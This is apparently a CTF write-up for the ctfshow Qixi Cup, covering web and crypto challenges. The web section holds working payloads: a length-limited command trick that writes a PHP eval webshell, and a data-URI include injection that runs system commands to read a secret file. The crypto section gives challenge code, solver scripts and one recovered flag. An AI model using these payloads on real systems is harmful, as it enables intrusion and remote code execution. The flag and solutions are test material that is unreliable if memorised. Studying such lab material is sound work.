# WEB
# 签到
位数可控字符 rce
echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php
>hp | |
>1.p\\ | |
>d\>\\ | |
>\ -\\ | |
>e64\\ | |
>bas\\ | |
>7\|\\ | |
>XSk\\ | |
>Fsx\\ | |
>dFV\\ | |
>kX0\\ | |
>bCg\\ | |
>XZh\\ | |
>AgZ\\ | |
>waH\\ | |
>PD9\\ | |
>o\ \\ | |
>ech\\ | |
ls -t>0 | |
sh 0 |
# easy_calc
<?php | |
if(check($code)){ | |
eval('$result='."$code".";"); | |
echo($result); | |
} | |
function check(&$code){ | |
$num1=$_POST['num1']; | |
$symbol=$_POST['symbol']; | |
$num2=$_POST['num2']; | |
if(!isset($num1) || !isset($num2) || !isset($symbol) ){ | |
return false; | |
} | |
if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol)){ | |
return false; | |
} | |
if(preg_match("/^[\+\-\*\/]$/", $symbol)){ | |
$code = "$num1$symbol$num2"; | |
return true; | |
} | |
return false; | |
} |
从题目代码来看,是输入 3 个值,分别是 num1、符号值、num2
然后过滤了一大堆符号,把三个值拼接而成
显而易见用 include 这个
num1=include "data:ctfshow&symbol=/&num2=b;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4"; |
传参
1=system("ls /")
发现 secret
1=system("cat /se*")
也可以直接用这个
num1=include "data:ctfshow&symbol=/&num2=b;base64,PD9waHAgc3lzdGVtKCdjYXQgL3NlY3JldCcpOyA/Pg";
# Crypto
# Lucky 𝟕
# 题目
from Crypto.Util.number import bytes_to_long, getPrime | |
from secret import flag | |
l = len(flag) | |
assert l == 56 | |
x = bytes_to_long(flag[:l//2]) | |
y = bytes_to_long(flag[l//2:]) | |
p = getPrime(1024) | |
e = 0x10001 | |
x = pow(x, e, p) | |
y = pow(y, e, p) | |
a = (7 * x + x * y + 77 * y ** 7) % p | |
b = (x ** 7 + 777 * y) % p | |
print(f'p = {p}') | |
print(f'a = {a}') | |
print(f'b = {b}') | |
# p = 160676801612994301361202519503059426958636739446670462398261976532859847492256822690640058297338763725128097587993428329580105931247817467950370089691908132361316857330836120708767594061772979871315614755470773991633234068651435625372887767258609941208307491359777513843529144444836847722372845148836203335627 | |
# a = 30318995909014771647618268716833486449002423009996671727903532973647046764624121316716790986592523978549131384964872198795285872746623966910764159262479160147876027157581577141632378119375701270068263640642243000011932466519579133761464923463402462812787531220639360431295348786697861069940729757964584951972 | |
# b = 51036630170491152581994259808984114372634216659979376101433163181132141957563047348137651942358538069256102718534893846618166559129391336639526588292370462975735415885732360576961407017238385374280336346614960555565504032093702784952402038043052556719843691506943605133036720410419999467125928578673380637828 |
sage 求解
# exp
# Sage | |
from sage.matrix.matrix2 import Matrix | |
from Crypto.Util.number import long_to_bytes | |
def resultant(f1, f2, var): | |
return Matrix.determinant(f1.sylvester_matrix(f2, var)) | |
p = 160676801612994301361202519503059426958636739446670462398261976532859847492256822690640058297338763725128097587993428329580105931247817467950370089691908132361316857330836120708767594061772979871315614755470773991633234068651435625372887767258609941208307491359777513843529144444836847722372845148836203335627 | |
a = 30318995909014771647618268716833486449002423009996671727903532973647046764624121316716790986592523978549131384964872198795285872746623966910764159262479160147876027157581577141632378119375701270068263640642243000011932466519579133761464923463402462812787531220639360431295348786697861069940729757964584951972 | |
b = 51036630170491152581994259808984114372634216659979376101433163181132141957563047348137651942358538069256102718534893846618166559129391336639526588292370462975735415885732360576961407017238385374280336346614960555565504032093702784952402038043052556719843691506943605133036720410419999467125928578673380637828 | |
e = 0x10001 | |
P.<x, y> = PolynomialRing(Zmod(p)) | |
f1 = 7 * x + x * y + 77 * y ** 7 - a | |
f2 = x ** 7 + 777 * y - b | |
# g=f1.resultant(f2, y) | |
# roots = g.univariate_polynomial().roots() | |
hx = resultant(f1, f2, y) | |
rx = hx.univariate_polynomial().roots() | |
x, _ = zip(*rx) | |
y = [((b - i^7) * inverse_mod(777, p)) % p for i in x] | |
d = inverse_mod(e, p-1) | |
for i in range(len(x)): | |
m1 = int(pow(x[i], d, p)) | |
m2 = int(pow(y[i], d, p)) | |
if(b'ctfshow' in long_to_bytes(m1)+long_to_bytes(m2)): | |
print(long_to_bytes(m1)+long_to_bytes(m2)) |
# 77XSES
# 题目
from Crypto.Util.Padding import pad | |
from secret import flag | |
S = [ | |
0x11,0x79,0x76,0x8b,0xb8,0x40,0x02,0xec,0x52,0xb5,0x78,0x36,0xf7,0x19,0x55,0x62, | |
0xaa,0x9a,0x34,0xbb,0xa4,0xfc,0x73,0x26,0x4b,0x21,0x60,0xd2,0x9e,0x10,0x67,0x2c, | |
0x32,0x17,0x87,0x1d,0x7e,0x57,0xd1,0x48,0x3c,0x1b,0x3f,0x37,0x1c,0x93,0x16,0x24, | |
0x13,0xe1,0x1f,0x91,0xb3,0x81,0x1e,0x3d,0x5b,0x6c,0xb9,0xf2,0x83,0x4c,0xd5,0x5a, | |
0xd0,0xe7,0xca,0xed,0x29,0x90,0x6f,0x8f,0xe4,0x2f,0xab,0xbe,0xfe,0x07,0x71,0x6b, | |
0x59,0xa3,0x8a,0x5e,0xd7,0x30,0x2a,0xa0,0xac,0xbd,0xd4,0x08,0x4f,0x06,0x31,0x72, | |
0x0d,0x9f,0xad,0x0b,0x23,0x80,0xe6,0xda,0x75,0xa8,0x18,0xe2,0x04,0xeb,0x8e,0x15, | |
0x64,0x77,0x2b,0x03,0xa1,0x5d,0xb4,0xb1,0xf0,0x97,0xe3,0xe8,0xb0,0x05,0x86,0x38, | |
0x56,0xef,0xfa,0x43,0x94,0xcb,0xb6,0x69,0x5f,0xc7,0x27,0x7c,0x44,0x8d,0xf3,0xc8, | |
0x99,0xc2,0xbc,0x82,0x65,0xdb,0xaf,0x51,0x20,0x7f,0xc3,0x53,0xf4,0x33,0x4d,0x50, | |
0xee,0xc5,0x12,0x63,0x9b,0x7b,0x39,0x45,0xa9,0x2d,0x54,0xdc,0xdf,0xd6,0xfd,0xa7, | |
0x5c,0x0c,0xe9,0xb2,0xa2,0xc1,0x49,0x00,0xae,0xea,0x58,0x6d,0xce,0x88,0xf8,0x96, | |
0xde,0x1a,0x0f,0x89,0xd3,0x7a,0x46,0x22,0xc6,0xf9,0xd9,0x84,0x2e,0x6a,0xc9,0x95, | |
0xa5,0xdd,0xe0,0x74,0x25,0xb7,0xfb,0xbf,0x9c,0x4a,0x92,0x0e,0x09,0x9d,0xf6,0x70, | |
0x61,0x66,0xc0,0xcf,0x35,0x98,0xf5,0x68,0x8c,0xd8,0x01,0x3e,0xba,0x6e,0x41,0xf1, | |
0xa6,0x85,0x3a,0x7d,0xff,0x0a,0x14,0xe5,0x47,0xcd,0x28,0x3b,0xcc,0x4e,0xc4,0x42 | |
] | |
def xor(block): | |
for i in range(4): | |
for j in range(4): | |
block[i][j] ^= block[(i + 2) % 4][(j + 1) % 4] | |
def add(block): | |
for i in range(4): | |
for j in range(4): | |
block[i][j] += 2 * block[(i * 3) % 4][(i + j) % 4] | |
block[i][j] &= 0xFF | |
def sub(block): | |
for i in range(4): | |
for j in range(4): | |
block[i][j] = S[block[i][j]] | |
def rotate(row): | |
row[0], row[1], row[2], row[3] = row[3], row[1], row[2], row[0] | |
def transpose(block): | |
copyBlock = [[block[i][j] for j in range(4)] for i in range(4)] | |
for i in range(4): | |
for j in range(4): | |
block[i][j] = copyBlock[j][i] | |
def swap(block): | |
block[0], block[2] = block[2], block[0] | |
block[3], block[2] = block[2], block[3] | |
block[0], block[1] = block[1], block[0] | |
block[3], block[0] = block[3], block[0] | |
block[2], block[1] = block[1], block[2] | |
block[2], block[0] = block[0], block[2] | |
rotate(block[0]); rotate(block[0]) | |
rotate(block[1]); rotate(block[1]); rotate(block[1]) | |
rotate(block[2]) | |
rotate(block[3]); rotate(block[3]); rotate(block[3]) | |
for i in range(3): | |
for j in range(4): | |
ii = ((block[i][j] & 0XFC) + i) % 4 | |
jj = (j + 3) % 4 | |
block[i][j], block[ii][jj] = block[ii][jj], block[i][j] | |
s = 0 | |
for i in range(4): | |
for j in range(4): | |
s += block[i][j] | |
if s % 2: | |
transpose(block) | |
def round(block): | |
sub(block) | |
add(block) | |
swap(block) | |
xor(block) | |
def encryptBlock(block): | |
mat = [[block[i * 4 + j] for j in range(4)] for i in range(4)] | |
for _ in range(77): | |
round(mat) | |
return [mat[i][j] for i in range(4) for j in range(4)] | |
def encrypt(msg): | |
msg = list(pad(msg, 16)) | |
enc = [] | |
for i in range(0, len(msg), 16): | |
enc += encryptBlock(msg[i : i + 16]) | |
return bytes(enc) | |
print(encrypt(flag).hex()) | |
# f000ae7e94f48ef99da6390f99a08701cf16d63596bebac938ec36004d54b73d1712c2f38926c3bcc5e5f42c4d55b57ef1070a7b443677b3cc4372d9a41a4775 |
简单的逆一下 就好了
# exp
from Crypto.Util.Padding import pad | |
from Crypto.Util.number import * | |
S = [ | |
0x11,0x79,0x76,0x8b,0xb8,0x40,0x02,0xec,0x52,0xb5,0x78,0x36,0xf7,0x19,0x55,0x62, | |
0xaa,0x9a,0x34,0xbb,0xa4,0xfc,0x73,0x26,0x4b,0x21,0x60,0xd2,0x9e,0x10,0x67,0x2c, | |
0x32,0x17,0x87,0x1d,0x7e,0x57,0xd1,0x48,0x3c,0x1b,0x3f,0x37,0x1c,0x93,0x16,0x24, | |
0x13,0xe1,0x1f,0x91,0xb3,0x81,0x1e,0x3d,0x5b,0x6c,0xb9,0xf2,0x83,0x4c,0xd5,0x5a, | |
0xd0,0xe7,0xca,0xed,0x29,0x90,0x6f,0x8f,0xe4,0x2f,0xab,0xbe,0xfe,0x07,0x71,0x6b, | |
0x59,0xa3,0x8a,0x5e,0xd7,0x30,0x2a,0xa0,0xac,0xbd,0xd4,0x08,0x4f,0x06,0x31,0x72, | |
0x0d,0x9f,0xad,0x0b,0x23,0x80,0xe6,0xda,0x75,0xa8,0x18,0xe2,0x04,0xeb,0x8e,0x15, | |
0x64,0x77,0x2b,0x03,0xa1,0x5d,0xb4,0xb1,0xf0,0x97,0xe3,0xe8,0xb0,0x05,0x86,0x38, | |
0x56,0xef,0xfa,0x43,0x94,0xcb,0xb6,0x69,0x5f,0xc7,0x27,0x7c,0x44,0x8d,0xf3,0xc8, | |
0x99,0xc2,0xbc,0x82,0x65,0xdb,0xaf,0x51,0x20,0x7f,0xc3,0x53,0xf4,0x33,0x4d,0x50, | |
0xee,0xc5,0x12,0x63,0x9b,0x7b,0x39,0x45,0xa9,0x2d,0x54,0xdc,0xdf,0xd6,0xfd,0xa7, | |
0x5c,0x0c,0xe9,0xb2,0xa2,0xc1,0x49,0x00,0xae,0xea,0x58,0x6d,0xce,0x88,0xf8,0x96, | |
0xde,0x1a,0x0f,0x89,0xd3,0x7a,0x46,0x22,0xc6,0xf9,0xd9,0x84,0x2e,0x6a,0xc9,0x95, | |
0xa5,0xdd,0xe0,0x74,0x25,0xb7,0xfb,0xbf,0x9c,0x4a,0x92,0x0e,0x09,0x9d,0xf6,0x70, | |
0x61,0x66,0xc0,0xcf,0x35,0x98,0xf5,0x68,0x8c,0xd8,0x01,0x3e,0xba,0x6e,0x41,0xf1, | |
0xa6,0x85,0x3a,0x7d,0xff,0x0a,0x14,0xe5,0x47,0xcd,0x28,0x3b,0xcc,0x4e,0xc4,0x42 | |
] | |
def xor(block): | |
for i in range(3,-1,-1): | |
for j in range(3,-1,-1): | |
block[i][j] ^= block[(i + 2) % 4][(j + 1) % 4] | |
def add(block): | |
for i in range(3,-1,-1): | |
for j in range(3,-1,-1): | |
if(i==0): | |
if(block[i][j]%3==0): | |
block[i][j]//=3 | |
else: | |
block[i][j]|=256 | |
if (block[i][j] % 3 == 0): | |
block[i][j] //= 3 | |
else: | |
block[i][j] ^=768 | |
block[i][j] //= 3 | |
else: | |
block[i][j] -= 2 * block[(i * 3) % 4][(i + j) % 4] | |
block[i][j] &= 0xFF | |
def sub(block): | |
for i in range(4): | |
for j in range(4): | |
block[i][j] = S.index(block[i][j]) | |
def rotate(row): | |
row[0], row[1], row[2], row[3] = row[3], row[1], row[2], row[0] | |
def transpose(block): | |
copyBlock = [[block[i][j] for j in range(4)] for i in range(4)] | |
for i in range(4): | |
for j in range(4): | |
block[i][j] = copyBlock[j][i] | |
def swap(block): | |
s = 0 | |
for i in range(4): | |
for j in range(4): | |
s += block[i][j] | |
if s % 2: | |
transpose(block) | |
for i in range(2,-1,-1): | |
for j in range(3,-1,-1): | |
ii = ((block[i][j] & 0XFC) + i) % 4 | |
jj = (j + 3) % 4 | |
block[i][j], block[ii][jj] = block[ii][jj], block[i][j] | |
rotate(block[3]) | |
rotate(block[3]) | |
rotate(block[3]) | |
rotate(block[2]) | |
rotate(block[1]) | |
rotate(block[1]) | |
rotate(block[1]) | |
rotate(block[0]) | |
rotate(block[0]) | |
block[2], block[0] = block[0], block[2] | |
block[2], block[1] = block[1], block[2] | |
block[3], block[0] = block[3], block[0] | |
block[0], block[1] = block[1], block[0] | |
block[3], block[2] = block[2], block[3] | |
block[0], block[2] = block[2], block[0] | |
def round(block): | |
xor(block) | |
swap(block) | |
add(block) | |
sub(block) | |
def encryptBlock(block): | |
mat = [[block[i * 4 + j] for j in range(4)] for i in range(4)] | |
for _ in range(77): | |
round(mat) | |
return [mat[i][j] for i in range(4) for j in range(4)] | |
def encrypt(msg): | |
msg = list(msg) | |
enc = [] | |
for i in range(0, len(msg), 16): | |
enc += encryptBlock(msg[i : i + 16]) | |
return bytes(enc) | |
a=0xf000ae7e94f48ef99da6390f99a08701cf16d63596bebac938ec36004d54b73d1712c2f38926c3bcc5e5f42c4d55b57ef1070a7b443677b3cc4372d9a41a4775 | |
a=long_to_bytes(a) | |
print(encrypt(a)) | |
#ctfshow{le4RNin9_h0w_70_revER5e_5IMple_Se5_i5_iN7Ere57InG} |
# 优势在我
# 题目
from Crypto.Util.number import * | |
import hashlib | |
import sys | |
from private import d | |
def pr(x, end="\n"): | |
sys.stdout.write(str(x)+end) | |
sys.stdout.flush() | |
BANNER = """ | |
比赛名称:七夕杯 | |
题目难度:优势在我 | |
比赛奖励:排名1:华为手环6_Pro+定制夏日T-shirt | |
排名2-10:定制夏日T-shirt | |
比赛时间:2022年8月4日(周四) 18时整 | |
比赛时长:24小时 | |
地址:https://www.ctf.show/challenges | |
投稿邮箱:ctfshow@163.com | |
投稿奖励:绿盟扩展坞一个 | |
""" | |
N = 18546721845979927569500143751660105533561486316231224465080625317376238264944740878457193385226698959802719372533690834284860737851929107163579187879895388120942312652954549671398264315985738386063687826049340153475764762320419809887400141782272319772175613926330746384510813184415900331770119033044622690940477810277396517358312757248120240055407842257982535105406966617903737782220404404644459553334905091694987679788339901767262741660223359618116200505397580036748964773373441655648565481823043475551779287949673519191553190302422175246969165641890331993628578551062334369824625164536808726394693221961254696074691 | |
e = 65537 | |
p = 24074624372939710957902553829568388349796810585932597965247721110129830468800036256026076982213498961372616008101708874099574700088150475222639563817914865052788850184089778132465415340980378135746900061263517304153485433985299953682148733981366808528082636204740025363446729188464380931250501761664305346381138286856186476986484913576109916879190154878781616175599052154216615394032414499234529973797040464698872321982946683153298157064531262284470661150270186224788419122959403896437988552792877168892664837002108590144855389176310488655364026719942320436915792611600545729690463037233338070404315644982404557646573 | |
g = 2 | |
with open("flag.txt", "rb") as f: | |
flag = f.read() | |
flag = bytes_to_long(flag) | |
assert flag < N | |
def strange_tales(x): | |
msg1 = b"Never gonna make you cry" + x | |
msg2 = b"Never gonna say goodbye" + x | |
return bytes_to_long(hashlib.sha512(msg1).digest() + hashlib.sha512(msg2).digest()) | |
def full_of_foolish_talk(x): | |
k = getRandomRange(0, p - 1) | |
r = pow(g, k, p) | |
e = strange_tales(str(r).encode() + b"Never gonna tell a lie and hurt you") | |
s = (k - x * e) % (p - 1) | |
return r, s | |
pr(BANNER) | |
pr(f"We're no strangers to love: {pow(flag, e, N)}") | |
pr("You know the rules and SO DO I") | |
while True: | |
pr("> ", end="") | |
c = int(input()) | |
m = pow(c, d, N) | |
r, s = full_of_foolish_talk(m) | |
pr(f"Never gonna give you up: {r}") | |
pr(f"Never gonna let you down: {s}") |
